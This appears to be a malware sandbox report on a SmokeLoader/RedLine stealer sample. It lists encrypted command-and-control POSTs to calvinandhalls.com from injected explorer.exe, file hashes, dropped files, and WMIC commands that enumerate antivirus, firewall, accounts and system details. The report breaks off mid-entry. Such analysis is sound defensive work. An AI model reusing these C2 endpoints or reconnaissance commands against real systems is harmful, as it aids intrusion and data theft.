                                                                       2024-09-25 14:02:36 UTC | 409 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered wh


Session ID: 12 | Source IP: 192.168.2.5 | Source Port: 49755 | Destination IP: 23.145.40.162 | Destination Port: 443 | PID: 1028 | Process: C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-25 14:03:53 UTC | 290 | OUT | POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://ygokuufxqffgxycc.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 109
Host: calvinandhalls.com
2024-09-25 14:03:53 UTC | 109 | OUT | Data Raw: 72 19 84 be ff 0e 15 8c 6e 87 e1 1f 33 84 61 28 ad 80 b3 d0 17 07 44 86 72 01 c1 e3 ef d5 42 9b 7c 9b b7 f4 73 88 a2 80 f5 0a d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
Data Ascii: rn3a(DrB|s(#%P g3iqH[CLk4%<2eQvb%;=j ,
2024-09-25 14:03:53 UTC | 285 | IN | HTTP/1.1 404 Not Found
Date: Wed, 25 Sep 2024 14:03:53 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Length: 7
Content-Type: text/html; charset=utf-8
Connection: close
2024-09-25 14:03:53 UTC | 7 | IN | Data Raw: 03 00 00 00 1e 0d af
Data Ascii:


Session ID: 13 | Source IP: 192.168.2.5 | Source Port: 49757 | Destination IP: 23.145.40.162 | Destination Port: 443 | PID: 1028 | Process: C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-25 14:04:13 UTC | 288 | OUT | POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://exeynemntnpasq.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 109
Host: calvinandhalls.com
2024-09-25 14:04:13 UTC | 109 | OUT | Data Raw: 72 19 84 be ff 0e 15 8c 6e 87 e1 1f 33 84 61 28 ad 80 b3 d0 17 07 44 86 72 01 c1 e3 ef d5 42 9b 7c 9b b7 f4 73 88 a2 80 f5 0a d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
Data Ascii: rn3a(DrB|s(#%P g3iqH[CLk4%<2eQvb%;=j ,
2024-09-25 14:04:14 UTC | 285 | IN | HTTP/1.1 404 Not Found
Date: Wed, 25 Sep 2024 14:04:14 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Length: 7
Content-Type: text/html; charset=utf-8
Connection: close
2024-09-25 14:04:14 UTC | 7 | IN | Data Raw: 03 00 00 00 1e 0d af
Data Ascii:


Session ID: 14 | Source IP: 192.168.2.5 | Source Port: 49759 | Destination IP: 23.145.40.162 | Destination Port: 443 | PID: 1028 | Process: C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-25 14:04:36 UTC | 286 | OUT | POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://rakvoqbrycri.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 109
Host: calvinandhalls.com
2024-09-25 14:04:36 UTC | 109 | OUT | Data Raw: 72 19 84 be ff 0e 15 8c 6e 87 e1 1f 33 84 61 28 ad 80 b3 d0 17 07 44 86 72 01 c1 e3 ef d5 42 9b 7c 9b b7 f4 73 88 a2 80 f5 0a d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
Data Ascii: rn3a(DrB|s(#%P g3iqH[CLk4%<2eQvb%;=j ,
2024-09-25 14:04:37 UTC | 285 | IN | HTTP/1.1 404 Not Found
Date: Wed, 25 Sep 2024 14:04:37 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Length: 7
Content-Type: text/html; charset=utf-8
Connection: close
2024-09-25 14:04:37 UTC | 7 | IN | Data Raw: 03 00 00 00 1e 0d af
Data Ascii:


Session ID: 15 | Source IP: 192.168.2.5 | Source Port: 49761 | Destination IP: 23.145.40.162 | Destination Port: 443 | PID: 1028 | Process: C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-25 14:04:59 UTC | 289 | OUT | POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://yjslvmtqvthxoxo.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 109
Host: calvinandhalls.com
2024-09-25 14:04:59 UTC | 109 | OUT | Data Raw: 72 19 84 be ff 0e 15 8c 6e 87 e1 1f 33 84 61 28 ad 80 b3 d0 17 07 44 86 72 01 c1 e3 ef d5 42 9b 7c 9b b7 f4 73 88 a2 80 f5 0a d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
Data Ascii: rn3a(DrB|s(#%P g3iqH[CLk4%<2eQvb%;=j ,
2024-09-25 14:04:59 UTC | 285 | IN | HTTP/1.1 404 Not Found
Date: Wed, 25 Sep 2024 14:04:59 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Length: 7
Content-Type: text/html; charset=utf-8
Connection: close
2024-09-25 14:04:59 UTC | 7 | IN | Data Raw: 03 00 00 00 1e 0d af
Data Ascii:


Target ID: 0
Start time: 10:01:01
Start date: 25/09/2024
Path: C:\Users\user\Desktop\KTh1gQlT9a.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\KTh1gQlT9a.exe"
Imagebase: 0x400000
File size: 418'304 bytes
MD5 hash: 6D9B8FF6442E3C42A7AD0E1238960057
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2141528306.00000000040E1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2141528306.00000000040E1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2138650769.0000000002600000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2139720397.000000000265D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2138710138.0000000002610000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2138710138.0000000002610000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Reputation: low
Has exited: true

Target ID: 2
Start time: 10:01:07
Start date: 25/09/2024
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0x7ff674740000
File size: 5'141'208 bytes
MD5 hash: 662F4F92FDE3557E86D110526BB578D5
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 4
Start time: 10:01:25
Start date: 25/09/2024
Path: C:\Users\user\AppData\Roaming\esjbbri
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\esjbbri
Imagebase: 0x400000
File size: 418'304 bytes
MD5 hash: 6D9B8FF6442E3C42A7AD0E1238960057
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.2365373242.00000000026CD000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2365295307.0000000002631000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2365295307.0000000002631000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.2365221336.0000000002520000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2365240792.0000000002530000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2365240792.0000000002530000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 34%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 6
Start time: 10:01:55
Start date: 25/09/2024
Path: C:\Users\user\AppData\Local\Temp\E647.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\E647.exe
Imagebase: 0x400000
File size: 417'280 bytes
MD5 hash: 1A29ED2D1AE240EC1D6F50DCC960BAA3
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2655758710.00000000040F1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2655758710.00000000040F1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.2655596562.000000000266D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2655384170.0000000002620000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2655384170.0000000002620000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.2655265915.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000003.2603297963.0000000002610000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
Reputation: low
Has exited: true

Target ID: 7
Start time: 10:02:19
Start date: 25/09/2024
Path: C:\Users\user\AppData\Roaming\uejbbri
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\uejbbri
Imagebase: 0x400000
File size: 417'280 bytes
MD5 hash: 1A29ED2D1AE240EC1D6F50DCC960BAA3
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.2900663679.00000000025ED000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000007.00000002.2900388143.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.2900412124.00000000024B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000007.00000002.2900412124.00000000024B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000003.2843112467.00000000024B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.2900483247.00000000025B1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000007.00000002.2900483247.00000000025B1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
Reputation: low
Has exited: true

Target ID: 8
Start time: 10:02:27
Start date: 25/09/2024
Path: C:\Users\user\AppData\Local\Temp\B575.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\AppData\Local\Temp\B575.exe
Imagebase: 0x7ff7cb870000
File size: 78'336 bytes
MD5 hash: 12AD2C78F5EB326820444DCFE9DFA683
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
Reputation: low
Has exited: false

Target ID: 9
Start time: 10:02:28
Start date: 25/09/2024
Path: C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\explorer.exe
Imagebase: 0x940000
File size: 4'514'184 bytes
MD5 hash: DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 10
Start time: 10:02:28
Start date: 25/09/2024
Path: C:\Windows\System32\msiexec.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\msiexec.exe /V
Imagebase: 0x7ff624250000
File size: 69'632 bytes
MD5 hash: E5DA170027542E25EDE42FC54C929077
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 11
Start time: 10:02:29
Start date: 25/09/2024
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\explorer.exe
Imagebase: 0x7ff674740000
File size: 5'141'208 bytes
MD5 hash: 662F4F92FDE3557E86D110526BB578D5
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                                                      Target ID:12
                                                                      Start time:10:02:30
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                      Imagebase:0x940000
                                                                      File size:4'514'184 bytes
                                                                      MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 0000000C.00000002.4535195693.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:moderate
                                                                      Has exited:false

                                                                      Target ID:13
                                                                      Start time:10:02:32
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\explorer.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\explorer.exe
                                                                      Imagebase:0x7ff674740000
                                                                      File size:5'141'208 bytes
                                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 0000000D.00000002.4535198953.0000000000D21000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:14
                                                                      Start time:10:02:32
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\System32\cmd.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:cmd
                                                                      Imagebase:0x7ff643210000
                                                                      File size:289'792 bytes
                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:15
                                                                      Start time:10:02:32
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6d64d0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:false

                                                                      Target ID:16
                                                                      Start time:10:02:33
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                      Imagebase:0x940000
                                                                      File size:4'514'184 bytes
                                                                      MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:false

                                                                      Target ID:17
                                                                      Start time:10:02:33
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
                                                                      Imagebase:0x7ff7eb220000
                                                                      File size:576'000 bytes
                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:18
                                                                      Start time:10:02:34
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\explorer.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\explorer.exe
                                                                      Imagebase:0x7ff674740000
                                                                      File size:5'141'208 bytes
                                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:false

                                                                      Target ID:19
                                                                      Start time:10:02:35
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
                                                                      Imagebase:0x7ff7eb220000
                                                                      File size:576'000 bytes
                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:20
                                                                      Start time:10:02:37
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
                                                                      Imagebase:0x7ff7eb220000
                                                                      File size:576'000 bytes
                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:21
                                                                      Start time:10:02:39
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
                                                                      Imagebase:0x7ff7eb220000
                                                                      File size:576'000 bytes
                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:22
                                                                      Start time:10:02:40
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
                                                                      Imagebase:0x7ff7eb220000
                                                                      File size:576'000 bytes
                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:23
                                                                      Start time:10:02:45
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
                                                                      Imagebase:0x7ff7eb220000
                                                                      File size:576'000 bytes
                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:24
                                                                      Start time:10:02:47
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
                                                                      Imagebase:0x7ff7eb220000
                                                                      File size:576'000 bytes
                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:25
                                                                      Start time:10:02:49
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
                                                                      Imagebase:0x7ff7eb220000
                                                                      File size:576'000 bytes
                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:26
                                                                      Start time:10:02:52
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
                                                                      Imagebase:0x7ff7eb220000
                                                                      File size:576'000 bytes
                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:27
                                                                      Start time:10:02:57
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
                                                                      Imagebase:0x7ff7eb220000
                                                                      File size:576'000 bytes
                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:28
                                                                      Start time:10:02:59
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
                                                                      Imagebase:0x7ff7eb220000
                                                                      File size:576'000 bytes
                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:29
                                                                      Start time:10:03:01
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
                                                                      Imagebase:0x7ff7eb220000
                                                                      File size:576'000 bytes
                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:30
                                                                      Start time:10:03:04
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
                                                                      Imagebase:0x7ff7eb220000
                                                                      File size:576'000 bytes
                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:31
                                                                      Start time:10:03:07
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
                                                                      Imagebase:0x7ff7eb220000
                                                                      File size:576'000 bytes
                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:32
                                                                      Start time:10:03:10
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\System32\ipconfig.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:ipconfig /displaydns
                                                                      Imagebase:0x7ff7e6180000
                                                                      File size:35'840 bytes
                                                                      MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:33
                                                                      Start time:10:03:11
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\System32\ROUTE.EXE
                                                                      Wow64 process (32bit):false
                                                                      Commandline:route print
                                                                      Imagebase:0x7ff67dbd0000
                                                                      File size:24'576 bytes
                                                                      MD5 hash:3C97E63423E527BA8381E81CBA00B8CD
                                                                      Has elevated privileges:false
